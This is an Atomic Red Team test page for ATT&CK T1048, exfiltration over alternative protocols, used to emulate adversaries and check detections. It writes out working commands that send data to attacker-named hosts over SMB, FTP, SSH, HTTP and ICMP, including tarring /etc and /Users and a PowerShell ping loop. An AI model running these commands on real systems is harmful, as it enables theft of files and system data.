Skip to content

Latest commit

 

History

History
126 lines (74 loc) · 3.96 KB

T1048.md

File metadata and controls

126 lines (74 loc) · 3.96 KB
Raw

T1048 - Exfiltration Over Alternative Protocol

Description from ATT&CK

Data exfiltration is performed with a different protocol from the main command and control protocol or channel. The data is likely to be sent to an alternate network location from the main command and control server. Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different channels could include Internet Web services such as cloud storage.

Adversaries may leverage various operating system utilities to exfiltrate data over an alternative protocol.

SMB command-line example:

  • net use \\attacker_system\IPC$ /user:username password && xcopy /S /H /C /Y C:\Users\* \\attacker_system\share_folder</code>

Anonymous FTP command-line example:(Citation: Palo Alto OilRig Oct 2016)

  • echo PUT C:\Path\to\file.txt | ftp -A attacker_system

Atomic Tests


Atomic Test #1 - Exfiltration Over Alternative Protocol - SSH

Input a domain and test Exfiltration over SSH

Remote to Local

Supported Platforms: macOS, CentOS, Ubuntu, Linux

Inputs

Name Description Type Default Value
domain target SSH domain url target.example.com
user_name username for domain string atomic
password password for user string atomic

Run it with sh!

ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz


Atomic Test #2 - Exfiltration Over Alternative Protocol - SSH

Input a domain and test Exfiltration over SSH

Local to Remote

Supported Platforms: macOS, CentOS, Ubuntu, Linux

Inputs

Name Description Type Default Value
domain target SSH domain url target.example.com
user_name username for domain string atomic
password password for user string atomic

Run it with sh!

tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'


Atomic Test #3 - Exfiltration Over Alternative Protocol - HTTP

A firewall rule (iptables or firewalld) will be needed to allow exfiltration on port 1337.

Supported Platforms: macOS, CentOS, Ubuntu, Linux

Run it with these steps!

  1. Victim System Configuration:

    mkdir /tmp/victim-staging-area echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt

  2. Using Python to establish a one-line HTTP server on victim system:

    cd /tmp/victim-staging-area python -m SimpleHTTPServer 1337

  3. To retrieve the data from an adversary system:

    wget http://VICTIM_IP:1337/victim-file.txt



Atomic Test #4 - Exfiltration Over Alternative Protocol - ICMP

Exfiltration of specified file over ICMP protocol.

Supported Platforms: Windows

Inputs

Name Description Type Default Value
input_file Path to file to be exfiltrated. Path C:\Windows\System32\notepad.exe
ip_address Destination IP address where the data should be sent. String 1.1.1.1

Run it with powershell!

$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) }